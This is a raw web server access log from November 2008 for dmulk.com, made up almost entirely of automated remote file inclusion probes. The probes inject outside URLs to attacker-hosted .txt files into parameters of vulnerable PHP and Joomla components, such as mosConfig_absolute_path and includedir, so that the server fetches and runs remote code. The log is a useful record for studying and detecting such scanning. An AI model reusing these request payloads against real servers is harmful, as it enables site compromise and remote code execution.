91.151.93.132 - - [10/Nov/2008:08:15:40 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/photo_album/includes/errors.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:08:15:40 -0800] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/errors.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:08:15:40 -0800] "GET /logs/access_080319.log//sohoadmin/program/modules/mods_full/photo_album/includes/errors.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:15:41 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:15:41 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:15:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:15:41 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.39.234.13 - - [10/Nov/2008:08:15:49 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:15:49 -0800] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:15:49 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:15:50 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:16:09 -0800] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:16:12 -0800] "GET /logs/access_080116.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:16:12 -0800] "GET /logs/access_080401.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:16:12 -0800] "GET /logs/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:16:13 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:16:21 -0800] "GET /logs/access_080109.log//modules/TotalCalendar/about.php?inc_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:16:21 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:16:21 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:16:29 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:16:29 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:16:29 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:16:29 -0800] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:16:34 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:16:38 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:16:38 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:16:39 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:16:40 -0800] "GET /common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:16:41 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:16:45 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:16:47 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:16:48 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:16:59 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:17:04 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.204 - - [10/Nov/2008:08:17:04 -0800] "GET /logs/access_071212.log//lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.204 - - [10/Nov/2008:08:17:05 -0800] "GET /lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.204 - - [10/Nov/2008:08:17:05 -0800] "GET /logs//lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:17:07 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:17:11 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:12 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:12 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:14 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.204 - - [10/Nov/2008:08:17:18 -0800] "GET /logs/access_071213.log//lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:18 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:18 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:18 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:17:20 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:17:26 -0800] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:17:26 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:29 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:29 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:17:29 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.23.236.98 - - [10/Nov/2008:08:17:42 -0800] "GET /logs/access_081010.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.131.17 - - [10/Nov/2008:08:17:55 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.55.131.17 - - [10/Nov/2008:08:17:55 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.55.131.17 - - [10/Nov/2008:08:17:56 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.55.131.17 - - [10/Nov/2008:08:17:56 -0800] "GET /logs/scripts.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.131.17 - - [10/Nov/2008:08:17:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:08:18:23 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cuon.de/x/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:08:18:23 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.cuon.de/x/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:08:18:23 -0800] "GET /logs/access_080124.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.cuon.de/x/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:08:18:23 -0800] "GET /logs/access_080229.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.cuon.de/x/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:18:29 -0800] "GET /logs/access_080321.log//agendax/addevent.inc.php?agendax_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:18:30 -0800] "GET /logs/access_080919.log%20/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:18:35 -0800] "GET /logs/access_080109.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:18:35 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:18:36 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:18:39 -0800] "GET /logs/access_080710.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:19:02 -0800] "GET /?board=free&act=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 200 94946 "-" "libwww-perl/5.48" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:19:20 -0800] "GET /logs/access_080919.log%20/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:08:19:21 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/photo_album/includes/get_login.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:08:19:22 -0800] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/get_login.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:08:19:22 -0800] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/get_login.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:19:23 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:19:23 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:19:23 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:08:19:26 -0800] "GET /logs/access_080319.log//sohoadmin/program/modules/mods_full/photo_album/includes/get_login.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:19:26 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.33.145 - - [10/Nov/2008:08:19:36 -0800] "GET /logs/access_080919.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.vennom.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.33.145 - - [10/Nov/2008:08:19:36 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.vennom.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.33.145 - - [10/Nov/2008:08:19:36 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.vennom.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:19:43 -0800] "GET /logs/access_080730.log//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:19:43 -0800] "GET /logs//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:19:43 -0800] "GET /vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:19:50 -0800] "GET /logs/access_080805.log//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.28.244 - - [10/Nov/2008:08:20:16 -0800] "GET /logs/access_080709.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.85.149.242 - - [10/Nov/2008:08:20:24 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
70.85.149.242 - - [10/Nov/2008:08:20:25 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 200 95265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:20:34 -0800] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:08:20:56 -0800] "GET /logs/access_080124.log//modules/TotalCalendar/about.php?inc_dir=http://www.cuon.de/x/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:08:20:57 -0800] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://www.cuon.de/x/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.211.40 - - [10/Nov/2008:08:21:04 -0800] "GET /blog/index.php/page/2/?show=slide&pageid=17 HTTP/1.1" 200 13399 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
203.23.236.98 - - [10/Nov/2008:08:21:04 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.236.98 - - [10/Nov/2008:08:21:05 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:21:16 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:21:16 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:21:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:21:50 -0800] "GET /logs/access_080109.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:21:51 -0800] "GET /logs/access_080124.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:08:21:54 -0800] "GET /lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:22:13 -0800] "GET /logs/access_080730.log//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:22:13 -0800] "GET /vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:22:13 -0800] "GET /logs//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:22:14 -0800] "GET /logs/access_080805.log/http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:22:14 -0800] "GET /http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:22:14 -0800] "GET /logs/http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:22:19 -0800] "GET /logs/access_080803.log/http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:22:19 -0800] "GET /logs/access_080805.log//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:22:37 -0800] "GET /logs/access_081027.log/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:22:44 -0800] "GET /logs/access_081026.log/?board=free&act=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
